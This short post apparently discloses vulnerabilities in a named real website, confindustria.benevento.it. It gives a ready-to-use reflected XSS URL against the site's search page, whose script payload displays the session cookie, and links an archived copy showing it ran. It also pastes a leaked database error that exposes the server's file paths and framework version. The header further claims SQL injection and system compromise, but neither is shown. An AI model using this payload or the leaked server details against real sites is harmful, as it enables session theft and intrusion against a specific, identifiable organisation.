http://www.confindustria.benevento.it/ | xss, sql injection, system compromise

simple XSS (via GET or POST)
http://www.confindustria.benevento.it/moduli/ricerca/ricerca.php?campo=%3Cscript%3Ealert(document.cookie);%3C/script%3E

archived (javascript that shows the cookie): http://archive.is/8WN7B


Fatal error: Uncaught exception 'Zend_Db_Adapter_Exception' with message 'SQLSTATE[08004] [1040] Too many connections' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php:138 Stack trace: #0 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Mysql.php(96): Zend_Db_Adapter_Pdo_Abstract->_connect() #1 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Mysql->_connect() #2 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(898): Zend_Db_Adapter_Abstract->quote('TITOLO_ITALIANO', NULL) #3 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(930): Zend_Db_Adapter_Abstract->quoteInto('variabile=?', 'TITOLO_ITALIANO', NULL) #4 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(463): Zend_Db_Select->_where('variabile=?', 'TITOLO_ITALIANO', NULL, true) #5 /var/www/vhosts/confindustria.benevento.it/httpdocs/includes/php/class/setting.class.php(65): Zend_Db_Select->where('variabile=?' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php on line 138